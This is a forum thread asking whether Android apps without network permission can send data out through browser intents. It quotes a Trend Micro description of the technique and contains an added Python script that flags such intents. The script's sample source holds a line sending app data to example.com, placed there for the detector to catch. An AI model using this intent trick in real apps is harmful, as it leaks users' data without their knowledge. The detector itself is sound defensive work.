  1. #1  agp101 (Thread Author)

    Not like many care.. but is this a huge security hole?

    Hey everyone.

    I'm here today hoping to acquire useful information and knowledge from you good folks. I think I may have been misled by a misconception of mine, and I need to get to the bottom of it.

    I'm very security conscious. That is, I am as secure as can be to the best of my knowledge. I have 2-step verification turned on on about 8 different services, and I vigorously go through Android app permission details, for example. I take security seriously and try my best to stay safe. Some don't care and some do, whatever. Personal choice.

    One (misconception?) I've had about permissions is that unless an app has an internet permission, specifically, "Full Internet Access", it cannot send (upload) data to the internet. So for example, when I installed the app "Dash Notifier" (I'm not saying this app is malicious, merely discussing it as an example of a possible situation) which is a Dash Clock Widget extension, I didn't mind giving it access to my notifications at the OS level. It was a slight red flag, as it always should be, but then again this was needed for the app to perform its function. Fair enough. It only had "prevent phone from sleeping" as a permission anyway, so it CAN'T upload data to the internet, or a server, right? Right??

    Well, I'm not so sure anymore. My friend factory reset their Android device, and I recommended they install the Dash Notifier extension. After all, this friend already had the Dash Clock Widget. So they did install it, and upon setup it asked for this Notifications access, which pretty much sells the app your soul. Again, a red flag arises naturally, but I said I must not have allowed this app on my device if it was a security risk.

    So I do my double check and check the permissions.. Just "prevent phone from sleeping." So I said okay, can't do anything with the information I approved for it anyway. But is that really the case, I asked? So I found another app I had installed which required "Full Internet Access". I clicked on it for a description and it said "Allows the app to create network sockets and use custom network protocols. The browser and other applications provide means to send data to the internet, so this permission is not required to send data to the internet."

    I've read this a bunch of times and always found it vague (aren't they all?). But this time I really got to thinking "Can apps really send out data without internet permissions at all? Without ANY permissions for that matter?" (Granted that they have access to this information through other permissions.)

    So I did some quick research and at the end of it, I found a blog post by Trend Micro at this link here: Bypassing Android Permissions: What You Need to Know

    So far I haven't found any sources which support a counter argument to this blog, which is why I'm here personally asking you folks for some genuine knowledge on the matter, for myself and anyone else interested.
    Excerpt:
    Misusing the Default Browser to Upload Information

    In Android, an app can launch another app's component using an intent, an abstract data structure that describes the operation to be executed. Each intent consists of action (the action to be performed) and data required to execute the action. When an app sends out an intent, the mobile OS chooses the appropriate app to handle it.

    An intent with action Intent.ACTION_VIEW, for example, paired with data Uri.parse(http://www.google.com) indicates that the app wants to view the Google webpage. If this intent is sent out, the mobile OS determines the best choice to launch the browser.

    With this in mind, a shady developer can develop an app with an intent to open a browser and upload any stolen data to the desired server. Should a malicious app want to upload the Device ID to server http://example.com, the developer can craft the intent this way:



    Since the browser opens the URL, the malicious app does not need to declare android.permission.INTERNET because this was already acquired by the browser app.
    This means any app mustn't request any permissions at all, yet can send data to a server ready to accept this data through a request to send data through the browser.

    This pretty much is my worst fear in terms of security. I understand apps need internet permissions to receive data and to display ads and whatnot. But if what I'm stumbling upon here is true it means that every single app on my phone, on your phone, on the Play Store, can send out any of our information to a server. This can't possibly be? This seems like a huge security hole to me. How can we possibly protect ourselves from any risk? The back door feels wide open.

    And apps need these permissions. For example, who doesn't use apps like WhatsApp or Viber, which have access to contacts and lots of other personal information, which puts not only you at risk but others too! If you don't have these apps that's okay, take your pick, you're using SOMETHING that requests personal information. There's always something. At the end of the day we need our phones to work for us but we need them to do it safely.

    So who knows anything about this? Anything legitimate? No more guesses, just facts.

    Thanks for reading, I know it was a long one.

    Posted via Android Central App
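
An audit-side view of the situation described in the post above, as an added example that is not part of the original post or of the Trend Micro article: it reads an app's decoded manifest and decompiled source and reports VIEW intents whose URL is assembled at run time, alongside whether INTERNET is declared. The package name, the sample manifest and the sample source lines are constructed for illustration, and the single-line pattern match is a simplifying assumption.

```python
import re
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

# Constructed sample: decoded manifest of a hypothetical app that asks only
# for WAKE_LOCK ("prevent phone from sleeping").
SAMPLE_MANIFEST = """<manifest
    xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.widgetext">
  <uses-permission android:name="android.permission.WAKE_LOCK"/>
</manifest>"""

# Constructed sample: decompiled Java lines from the same hypothetical app.
SAMPLE_SOURCE = (
    'String value = prefs.getString("note", "");\n'
    'Intent i = new Intent(Intent.ACTION_VIEW, Uri.parse("http://example.com/?q=" + value));\n'
    'startActivity(i);\n'
    'Intent help = new Intent(Intent.ACTION_VIEW, Uri.parse("http://example.com/help"));\n'
)

# ACTION_VIEW intent whose data comes straight from Uri.parse(...) on one line.
VIEW_INTENT = re.compile(r'Intent\.ACTION_VIEW\s*,\s*Uri\.parse\((?P<arg>.*)\)\s*\)\s*;')

def declared_permissions(manifest_xml):
    """Return the set of permission names in <uses-permission> elements."""
    root = ET.fromstring(manifest_xml)
    return {e.get(ANDROID_NS + "name") for e in root.iter("uses-permission")}

def dynamic_view_intents(source):
    """Return (line_no, line) for VIEW intents whose URL is built at run time."""
    hits = []
    for n, line in enumerate(source.splitlines(), 1):
        m = VIEW_INTENT.search(line)
        # A lone string literal is a fixed link; anything else carries data.
        if m and not re.fullmatch(r'"[^"]*"', m.group("arg").strip()):
            hits.append((n, line.strip()))
    return hits

def audit(manifest_xml, source):
    perms = declared_permissions(manifest_xml)
    return {
        "has_internet": "android.permission.INTERNET" in perms,
        "permissions": sorted(perms),
        "findings": dynamic_view_intents(source),
    }

if __name__ == "__main__":
    print(audit(SAMPLE_MANIFEST, SAMPLE_SOURCE))
```

A finding here is only a pointer for manual review: it shows where app data can reach the browser, not what the data is.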
  2. #2  Golfdriver97

    Re: Not like many care.. but is this a huge security hole?

    I would look this over: Android 101: What some of those scary application permissions mean | Android Central
    (It is a little dated, but still applies for the most part)
    Depending on the app and the permissions, most of the time the permissions they are associated with make sense.

  3. #3  agp101 (Thread Author)

    Yes thank you. Actually I've read that many times! It's a great guide.

    But in the case I'm bringing up, I'm referring to apps that can upload data to the internet without any permissions at all, because they can simply go through the browser and don't, in fact, need internet permissions at all. As far as I know, all apps could do this.

    Can anyone prove this wrong? I really hope someone can, cause that would be excellent news.

    Posted via Android Central App
  4. #4  

    Re: Not like many care.. but is this a huge security hole?

    Originally posted by agp101:
    Yes thank you. Actually I've read that many times! It's a great guide.

    But in the case I'm bringing up, I'm referring to apps that can upload data to the internet without any permissions at all, because they can simply go through the browser and don't, in fact, need internet permissions at all. As far as I know, all apps could do this.

    Can anyone prove this wrong? I really hope someone can, cause that would be excellent news.

    Posted via Android Central App

    Judging by the way you have provided this information, it seems a feasible method. Google, heck phone companies even, would not allow this, would they? If you could good sir, could you compile and send me all the info you've collected on this to my E-Mail? I'd really love to delve into this with some intent!
    Regards
    Michael Nancarrow
